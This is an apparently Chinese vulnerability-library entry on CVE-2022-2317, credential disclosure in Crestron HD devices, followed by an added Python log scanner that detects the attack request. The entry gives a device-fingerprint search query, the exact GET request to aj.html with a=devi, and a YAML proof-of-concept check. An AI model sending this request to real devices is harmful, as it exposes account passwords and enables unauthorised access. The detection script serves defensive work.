Crestron aj.html Account and Password Disclosure CVE-2022-2317 - Vulnerability Library Small World - Security Library - NGC660 Security Lab

Crestron aj.html Account and Password Disclosure CVE-2022-2317

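1. Vulnerability description

On Crestron HD and related device series, calling the aj.html page with a specific parameter returns sensitive information such as the account name and password.

2. Affected products

Crestron HD and related device series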

3. Asset mapping query

app="Crestron-HD-RX-201-C-E"

4. Vulnerability reproduction

GET:http://xxx//aj.html?a=devi

Yaml

params: []
name: poc-yaml-Crestron aj.html 账号密码泄漏
set: {}
rules:
- method: GET
  path: /aj.html?a=devi
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b'login_url')
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
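
A defender-side check for the request shown above, as an added example that is not part of the original page: it scans web access logs for requests to aj.html carrying a=devi and marks the ones answered with HTTP 200. The Combined Log Format, a logging proxy in front of the device, the function names and the sample lines are all assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Combined Log Format as written by a proxy in front of the device (assumption).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_aj_devi_request(target):
    """True if the request target is aj.html with query parameter a=devi."""
    # Split by hand: urlsplit() would read a leading "//" as a host name.
    path, _, query = target.partition("?")
    # Decode percent-escapes and collapse repeated slashes ("//aj.html").
    path = re.sub(r"/+", "/", unquote(path)).lower()
    if not path.endswith("/aj.html"):
        return False
    params = parse_qs(query, keep_blank_values=True)
    return any(v.lower() == "devi" for v in params.get("a", []))

def scan(lines):
    """Return one finding per matching request; 'served' marks HTTP 200."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_aj_devi_request(m["target"]):
            continue
        findings.append({
            "src": m["src"],
            "time": m["time"],
            "target": m["target"],
            "served": m["status"] == "200",
        })
    return findings

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2022:10:00:01 +0000] "GET /aj.html?a=devi HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Mar/2022:10:00:02 +0000] "GET //aj.html?a=devi HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Mar/2022:10:05:00 +0000] "GET /aj.html?x=1&a=%64evi HTTP/1.1" 403 0',
    '203.0.113.5 - - [01/Mar/2022:10:06:00 +0000] "GET /aj.html?a=other HTTP/1.1" 200 90',
    '203.0.113.5 - - [01/Mar/2022:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        state = "served" if f["served"] else "not served"
        print(f["time"], f["src"], f["target"], "->", state)
```

A finding with served set means the device answered the request, so the credentials it holds should be rotated and the management interface restricted to trusted networks.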